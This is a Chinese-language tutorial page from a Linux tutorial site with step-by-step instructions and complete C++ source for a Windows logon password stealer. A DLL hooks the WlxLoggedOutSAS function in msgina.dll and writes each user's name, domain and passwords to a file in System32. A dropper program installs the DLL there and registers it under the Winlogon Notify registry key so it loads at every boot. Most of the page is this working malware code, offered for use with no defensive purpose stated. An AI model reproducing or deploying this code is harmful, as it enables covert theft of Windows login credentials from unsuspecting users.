歡迎來到Linux教程網
Linux教程網
Linux教程網
Linux教程網
您现在的位置: Linux教程網 >> UnixLinux >  >> Linux編程 >> Linux編程

獲得系統密碼(對Windows 7無效)

實現步驟:

1. 生成GetInfo.dll

2. 將生成的GetInfo.dll作為資源放到GetPwd工程中

3. 生成GetInfo.exe

4. 運行GetInfo.exe install

5. 重啟機器,輸入密碼,進入系統後會得到C:\WINDOWS\System32\getPwdout.txt文件,文件內容為:

實現原理:

將GetInfo.dll,放在WinLogon\Notify注冊表下時,系統啟動後會自動加載GetInfo.dll,而GetInfo.dll在加載時會HOOK掉WlxLoggedOutSAS,系統登錄時winlogon會加載WlxLoggedOutSAS函數,這個函數輸出值中有

PWLX_MPR_NOTIFY_INFO

結構,其中就存儲了用戶名和密碼。winlogon在登錄時會調用這個函數,我們HOOK掉了這個函數,所以就能拿到登錄的用戶名和密碼了。。

GetInfo.dll的實現

  1. // GetInfo.cpp : Defines the entry point for the DLL application.  
  2. //  
  3.  
  4. #include "stdafx.h"  
  5. #include "GetInfo.h"  
  6. #include <stdio.h>  
  7. #include <fstream.h>  
  8. #include <iostream.h>  
  9.  
  10. //using namespace std;  
  11. //宏定義  
  12. #define WLX_SAS_ACTION_LOGON    (1)  
  13.  
  14. //WLX_MPR_NOTIFY_INFO結構  
  15. typedef struct _WLX_MPR_NOTIFY_INFO { 
  16.     PWSTR pszUserName; 
  17.     PWSTR pszDomain; 
  18.     PWSTR pszPassword; 
  19.     PWSTR pszOldPassword; 
  20. } WLX_MPR_NOTIFY_INFO, *PWLX_MPR_NOTIFY_INFO; 
  21.  
  22. //函數原形  
  23. typedef int (WINAPI* WlxLoggedOutSAS)( 
  24.                     PVOID pWlxContext, 
  25.                     DWORD dwSasType, 
  26.                     PLUID pAuthenticationId, 
  27.                     PSID pLogonSid, 
  28.                     PDWORD pdwOptions, 
  29.                     PHANDLE phToken, 
  30.                     PWLX_MPR_NOTIFY_INFO pNprNotifyInfo, 
  31.                     PVOID *pProfile 
  32.                     ); 
  33.  
  34. //自定義接管的API函數,形參保持一致  
  35. int WINAPI FunNewADDR( 
  36.                               PVOID pWlxContext, 
  37.                               DWORD dwSasType, 
  38.                               PLUID pAuthenticationId, 
  39.                               PSID pLogonSid, 
  40.                               PDWORD pdwOptions, 
  41.                               PHANDLE phToken, 
  42.                               PWLX_MPR_NOTIFY_INFO pNprNotifyInfo, 
  43.                               PVOID *pProfile 
  44.                     ); 
  45.  
  46.  
  47.  
  48. //定義字節對齊方式  
  49. #pragma pack(1)  
  50. struct HookTable{ 
  51.     HMODULE hMsgina; 
  52.     WlxLoggedOutSAS OldADDR; 
  53.     WlxLoggedOutSAS NewADDR; 
  54.     unsigned char charOldCode[6]; 
  55.     unsigned char charJmpCode[6]; 
  56. }; 
  57.  
  58. //全局hook表  
  59. HookTable hooktable = { 
  60. 0, 
  61. 0, 
  62. &FunNewADDR, 
  63. "\x8b\xff\x55\x8B\xEC", 
  64. "\xE9\x00\x00\x00\x00" 
  65. }; 
  66.  
  67. #pragma  pack()  
  68.  
  69. //////////////////////////////////////////////////////////////////////////  
  70. /////函數聲明  
  71. ///////////////////////////////////////////////////////////////////////////  
  72. VOID UnHookWlxLoggedOutSAS(); 
  73. VOID WriteLog(PWLX_MPR_NOTIFY_INFO pNprNotifyInfo); 
  74. DWORD WINAPI StartHook(LPVOID lpParam); 
  75. VOID HookWlxLoggedOutSAS(); 
  76.  
  77.  
  78. int WINAPI FunNewADDR( 
  79.                       PVOID pWlxContext, 
  80.                       DWORD dwSasType, 
  81.                       PLUID pAuthenticationId, 
  82.                       PSID pLogonSid, 
  83.                       PDWORD pdwOptions, 
  84.                       PHANDLE phToken, 
  85.                       PWLX_MPR_NOTIFY_INFO pNprNotifyInfo, 
  86.                       PVOID *pProfile 
  87.                     ) 
  88. /************************************************************************/ 
  89. /* 函數說明:自定義函數,用來取代WlxLoggedOutSAS                        */ 
  90. /* 參數:與WlxLoggedOutSAS參數相同                                      */ 
  91. /* 返回值:與WlxLoggedOutSAS返回值相同                                  */ 
  92. /************************************************************************/ 
  93.     UnHookWlxLoggedOutSAS(); 
  94.  
  95.     int i = hooktable.OldADDR(pWlxContext, dwSasType, pAuthenticationId, pLogonSid, pdwOptions, phToken, pNprNotifyInfo,pProfile); 
  96.     if (i == WLX_SAS_ACTION_LOGON) 
  97.     { 
  98.         WriteLog(pNprNotifyInfo); 
  99.     } 
  100.     return i; 
  101.  
  102.  
  103.  
  104. VOID WriteLog(PWLX_MPR_NOTIFY_INFO pNprNotifyInfo) 
  105. /************************************************************************/ 
  106. /* 函數說明:將得到的用戶名和密碼信息寫入%system%/getPwdout.txt文件中   */ 
  107. /* 參數:pNprNotifyInfo 包含用戶名和密碼的結構體                        */ 
  108. /* 返回值:無                                                           */ 
  109. /************************************************************************/ 
  110.     char szSystemDir[MAX_PATH] = {0}; 
  111.     GetSystemDirectory(szSystemDir, MAX_PATH - 1 ); 
  112.     char szFilePath[MAX_PATH] = {0}; 
  113.     strcat(szFilePath, szSystemDir); 
  114.     strcat(szFilePath, "\\getPwdout.txt"); 
  115.  
  116.     ofstream  outfile; 
  117.     outfile.open(szFilePath); 
  118.  
  119.     char szContent[1024 * 4] = {0}; 
  120.     sprintf(szContent, "username:%ws\nDomain:%ws\npassword:%ws\nOldPassword:%ws\n\n", pNprNotifyInfo->pszUserName, pNprNotifyInfo->pszDomain, pNprNotifyInfo->pszPassword, pNprNotifyInfo->pszOldPassword); 
  121.      
  122.     outfile.write(szContent, strlen(szContent)); 
  123.     outfile.close(); 
  124.  
  125.  
  126. VOID HookWlxLoggedOutSAS() 
  127. /************************************************************************/ 
  128. /* 函數說明:HOOK WlxLoggedOutSAS函數                              */ 
  129. /* 參數:無                                                             */ 
  130. /* 返回值:無                                                           */ 
  131. /************************************************************************/ 
  132.     DWORD OldProcte; 
  133.     VirtualProtect(hooktable.OldADDR, 5, PAGE_EXECUTE_READWRITE, &OldProcte); 
  134.  
  135.     unsigned char *p = (unsigned char*)hooktable.OldADDR; 
  136.     for (int i=0; i < 5; i++) 
  137.     { 
  138.         p[i] = hooktable.charJmpCode[i]; 
  139.     } 
  140.     VirtualProtect(hooktable.OldADDR, 5, OldProcte, &OldProcte); 
  141.     return
  142.  
  143. VOID UnHookWlxLoggedOutSAS() 
  144. /************************************************************************/ 
  145. /* 函數說明:恢復WlxLoggedOutSAS函數的原形                              */ 
  146. /* 參數:無                                                             */ 
  147. /* 返回值:無                                                           */ 
  148. /************************************************************************/ 
  149.     DWORD OldProcte; 
  150.     VirtualProtect(hooktable.OldADDR, 5, PAGE_EXECUTE_READWRITE, &OldProcte); 
  151.      
  152.     unsigned char *p = (unsigned char*)hooktable.OldADDR; 
  153.     for (int i=0; i < 5; i++) 
  154.     { 
  155.         p[i] = hooktable.charOldCode[i]; 
  156.     } 
  157.     VirtualProtect(hooktable.OldADDR, 5, OldProcte, &OldProcte); 
  158.     return
  159.  
  160. DWORD WINAPI StartHook(LPVOID lpParam) 
  161. /************************************************************************/ 
  162. /* 函數說明:得到WlxLoggedOutSAS函數地址,並HOOK WlxLoggedOutSAS函數    */ 
  163. /* 參數:無                                                             */ 
  164. /* 返回值:0表示成功                                                    */ 
  165. /************************************************************************/ 
  166.     //得到msgina.dll  
  167.     //hooktable.hMsgina   
  168.     int n = 0; 
  169.     hooktable.hMsgina = LoadLibrary("msgina.dll"); 
  170.     n  = GetLastError(); 
  171.     if (NULL == hooktable.hMsgina) 
  172.     { 
  173.         printf("getmoduleHandle msgina.dll error"); 
  174.         return -1; 
  175.     } 
  176.     //得到WlxLoggedOutSAS  
  177.     hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS"); 
  178.     if (NULL == hooktable.OldADDR) 
  179.     { 
  180.         printf("GetProcAddress WlxLoggedOutSAS error"); 
  181.         return -1; 
  182.     } 
  183.     int *OpCode = (int*)&hooktable.charJmpCode[1]; 
  184.     int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5; 
  185.     *OpCode = Code; 
  186.     HookWlxLoggedOutSAS(); 
  187.     return 0; 
  188. BOOL APIENTRY DllMain( HANDLE hModule,   
  189.                        DWORD  ul_reason_for_call,   
  190.                        LPVOID lpReserved 
  191.                      ) 
  192. /************************************************************************/ 
  193. /* 函數說明:DLL的主函數                                             */ 
  194. /* 參數:                                                              */ 
  195. /* 返回值:                                                             */ 
  196. /************************************************************************/ 
  197.     switch (ul_reason_for_call) 
  198.     { 
  199.         case DLL_PROCESS_ATTACH: 
  200.             { 
  201.                 //::CreateThread(NULL, 0, StartHook, NULL, 0, NULL);  
  202.                 StartHook(NULL); 
  203.             } 
  204.             break
  205.         case DLL_THREAD_ATTACH: 
  206.         case DLL_THREAD_DETACH: 
  207.         case DLL_PROCESS_DETACH: 
  208.             break
  209.     } 
  210.     return TRUE; 
  211.  
  212. // This is the constructor of a class that has been exported.  
  213. // see GetInfo.h for the class definition  
  214. CGetInfo::CGetInfo() 
  215. {   
  216.     return;   
  217.  
  218. extern "C" __declspec(dllexportvoid start() 
  219.     return

外殼工程:

  1. // getpwd.cpp : Defines the entry point for the console application.  
  2. //  
  3.  
  4. #include "afx.h"  
  5. #include <Windows.h>  
  6. #include "resource.h"  
  7. #include <Winerror.h>  
  8. #include <Shlwapi.h>  
  9. #pragma comment(lib, "Shlwapi.lib")  
  10.  
  11. LPBYTE CString_To_LPBYTE(CString str) 
  12. /************************************************************************/ 
  13. /* 函數說明:將cstring類型轉換成LPBYTE類型                              */ 
  14. /* 參數:str 要轉換的CString類型                                        */ 
  15. /* 返回值:LPBYTE 轉換後的LPBYTE類型                                    */ 
  16. /************************************************************************/ 
  17.  
  18.     LPBYTE lpb=new BYTE[str.GetLength()+1]; 
  19.     for(int i=0;i<str.GetLength();i++) 
  20.         lpb[i]=str[i]; 
  21.     lpb[str.GetLength()]=0; 
  22.     return lpb; 
  23.  
  24. BOOL install() 
  25. /************************************************************************/ 
  26. /* 函數說明:釋放DLL,並將DLL的路徑寫入到注冊表中                       */ 
  27. /* 參數:無                                                             */ 
  28. /* 返回值:無                                                           */ 
  29. /************************************************************************/ 
  30.     //釋放資源  
  31.     //定位我們的自定義資源,這裡因為我們是從本模塊定位資源,所以將句柄簡單地置為NULL即可  
  32.     HRSRC hRsrc = FindResource(NULL, MAKEINTRESOURCE(IDR_IDR_DLL1), TEXT("IDR_DLL")); 
  33.     if (NULL == hRsrc) 
  34.         return FALSE; 
  35.     //獲取資源的大小  
  36.     DWORD dwSize = SizeofResource(NULL, hRsrc);   
  37.     if (0 == dwSize) 
  38.         return FALSE; 
  39.     //加載資源  
  40.     HGLOBAL hGlobal = LoadResource(NULL, hRsrc);   
  41.     if (NULL == hGlobal) 
  42.         return FALSE; 
  43.     //鎖定資源  
  44.     LPVOID pBuffer = LockResource(hGlobal);   
  45.     if (NULL == pBuffer) 
  46.         return FALSE; 
  47.      
  48.     char szSystemDir[MAX_PATH] = {0}; 
  49.     GetSystemDirectory(szSystemDir, MAX_PATH-1); 
  50.     char szRelDll[MAX_PATH] = {0}; 
  51.     strcat(szRelDll, szSystemDir); 
  52.     strcat(szRelDll, "\\GetInfo.dll"); 
  53.     DeleteFile(szRelDll); 
  54.     HANDLE hFile = CreateFile(szRelDll, FILE_GENERIC_READ|FILE_GENERIC_WRITE, FILE_SHARE_READ, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); 
  55.     if (NULL == hFile) 
  56.     { 
  57.         return FALSE; 
  58.     } 
  59.     DWORD dwWritten; 
  60.     WriteFile(hFile, pBuffer, dwSize, &dwWritten, NULL); 
  61.  
  62.     CloseHandle(hFile);   
  63.     FreeResource(hGlobal); 
  64.  
  65.     //將釋放的DLL寫入到注冊 表的WINLOGON下,當WINLOGON啟動時,會加載這個DLL  
  66.     CString strDllPath = szRelDll; //("dog");  
  67.     //設置有關的數據  
  68.     //CString_To_LPBYTE,請參考下面的函數  
  69.     LPBYTE dllpath_Set=CString_To_LPBYTE(strDllPath);//定義用戶姓名 owner_Set  
  70.     DWORD type_1=REG_SZ;//定義數據類型  
  71.     DWORD cbData_1=strDllPath.GetLength()+1;//定義數據長度  
  72.      
  73.     DWORD status = SHSetValue(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\GetPwd\\", "dllname", type_1, dllpath_Set, cbData_1); 
  74.     if (ERROR_SUCCESS  != status) 
  75.     { 
  76.         printf("write reg:dllname error"); 
  77.         return FALSE; 
  78.     } 
  79.      
  80.     CString  strStartUp("dog"); 
  81.     LPBYTE startup_set=CString_To_LPBYTE(strStartUp);//定義公司名稱 company_Set  
  82.     DWORD type_2=REG_SZ;//定義數據類型  
  83.     DWORD cbData_2=strStartUp.GetLength()+1;//定義數據長度  
  84.      
  85.     status = SHSetValue(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\GetPwd\\", "startup", type_2, startup_set, cbData_2); 
  86.     if (ERROR_SUCCESS  != status) 
  87.     { 
  88.         printf("write reg:dllname error"); 
  89.         return FALSE; 
  90.     } 
  91.  
  92.     return TRUE; 
  93.  
  94. BOOL decry() 
  95. /************************************************************************/ 
  96. /* 函數說明:用於解密生成的密碼文件,生成密碼文件時沒有加密,所以這裡沒實現*/ 
  97. /* 參數:無                                                             */ 
  98. /* 返回值:無                                                           */ 
  99. /************************************************************************/ 
  100.     return TRUE; 
  101.  
  102. VOID usage() 
  103. /************************************************************************/ 
  104. /* 函數說明:打印使用幫助                                               */ 
  105. /* 參數:無                                                             */ 
  106. /* 返回值:無                                                           */ 
  107. /************************************************************************/ 
  108.     printf("************************************\n"); 
  109.     printf("usages:\n"); 
  110.     printf("getpwd.exe install\n"); 
  111.     printf("getpwd.exe decryp\n"); 
  112.     printf("************************************\n"); 
  113.  
  114.  
  115. int main(int argc, char* argv[]) 
  116. /************************************************************************/ 
  117. /* 函數說明:Main函數                                                   */ 
  118. /* 參數:無                                                             */ 
  119. /* 返回值:無                                                           */ 
  120. /************************************************************************/ 
  121.     if (argc != 2) 
  122.     { 
  123.         usage(); 
  124.         return -1; 
  125.     } 
  126.     if (stricmp(argv[1], "install") == 0) 
  127.     { 
  128.         install(); 
  129.         getchar(); 
  130.         return 0; 
  131.     } 
  132.     else if (stricmp(argv[1], "decryp") == 0) 
  133.     { 
  134.         decry(); 
  135.         return 0; 
  136.     } 
  137.     else 
  138.     { 
  139.         usage(); 
  140.         return 0; 
  141.     } 
  142.      
  143.     return 0; 
Copyright © Linux教程網 All Rights Reserved